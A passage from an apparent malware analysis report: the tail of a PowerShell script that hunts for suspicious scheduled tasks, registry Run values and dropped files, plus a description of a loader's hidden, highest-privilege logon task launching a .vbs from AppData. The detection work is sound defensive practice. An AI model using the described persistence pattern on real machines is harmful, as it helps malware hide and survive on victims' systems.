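        $key = Get-Item -Path $path -ErrorAction SilentlyContinue
        if (-not $key) { continue }
        foreach ($name in $key.GetValueNames()) {
            $value = [string]$key.GetValue($name)
            if (Test-ScriptFromProfile -Execute $value -Arguments '') {
                [pscustomobject]@{ Key = $path; Name = $name; Value = $value }
            }
        }
    }
}

function Find-DroppedFiles {
    # Exact names from this report; a different build may use other names, so the task and Run checks above are the general ones
    $DroppedFiles | Where-Object { Test-Path -LiteralPath $_ } | ForEach-Object { Get-Item -LiteralPath $_ }
}

Find-SuspiciousTasks     | Format-Table -AutoSize
Find-SuspiciousRunValues | Format-Table -AutoSize
Find-DroppedFiles        | Select-Object FullName, Length, LastWriteTime
```

The task created in the sandbox would show up with AtLogon True, Hidden True, RunLevel Highest and TimeLimit PT0S, executing the .vbs from Roaming AppData; any task with that combination and a script action deserves a look even when the names differ, because the loader's on-disk names are trivially changed between builds while the Register-ScheduledTask options are part of the stager logic.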
